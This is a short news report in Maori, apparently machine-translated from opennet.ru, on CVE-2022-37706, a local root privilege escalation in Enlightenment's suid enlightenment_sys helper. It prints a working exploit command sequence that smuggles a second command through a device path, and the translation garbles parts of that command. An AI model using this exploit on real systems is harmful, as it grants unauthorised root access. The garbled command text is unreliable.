Kua kitea he whakaraeraetanga i roto i te taiao kaiwhakamahi Enlightenment (CVE-2022-37706) ka taea e tetahi kaiwhakamahi rohe kore whai mana ki te mahi waehere hei pakiaka. Ko te whakaraeraetanga kaore ano kia whakatikahia (0-ra), engari he mahi kei roto i te rohe whanui, i whakamatauria i Ubuntu 22.04.
Ko te raruraru kei roto i te enlightenment_sys executable, e haere mai ana me te haki pakiaka suid me te whakahaere i etahi whakahau e whakaaetia ana ma te waea () punaha, penei i te whakapuru i te puku me te taputapu Maunga. Na te he o te mahi o te mahi e hanga ana i te aho i tukuna ki te punaha() waea, ka tapahia nga korero mai i nga tohenga o te whakahau e whakahaerehia ana, ka taea te whakamahi hei whakahaere i to ake waehere. Hei tauira, ka rere koe mkdir -p /tmp/net mkdir -p "/tmp/;/tmp/exploit" echo "/bin/sh" > /tmp/exploit chmod a+x /tmp/exploit enlightenment_sys /bin/ Maunga - o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp/ // kupenga
na te tangohanga o nga korukīrua, hei utu mo te whakahau kua tohua '/bin/mount… "/dev/../tmp/;/tmp/exploit" /tmp///net', ka tukuna he aho kaore he korukī rua. ki te mahinga () ' /bin/mount ... /dev/../tmp/;/tmp/exploit /tmp///net' ka puta te whakahau '/tmp/exploit /tmp///net' ki kia mahia motuhake, kaua e waiho hei waahanga o te ara ki te taputapu. Ko nga aho "/dev/../tmp/" me "/tmp///net" ka whiriwhiria hei karo i te arowhai tohenga whakahau a te maunga enlightenment_sys (me timata te taputapu ki runga /dev/ ka tohu ki tetahi konae, me te toru "/" i te waahi maunga kua tohua hei whakatutuki i te rahi o te ara e hiahiatia ana).
Source: opennet.ru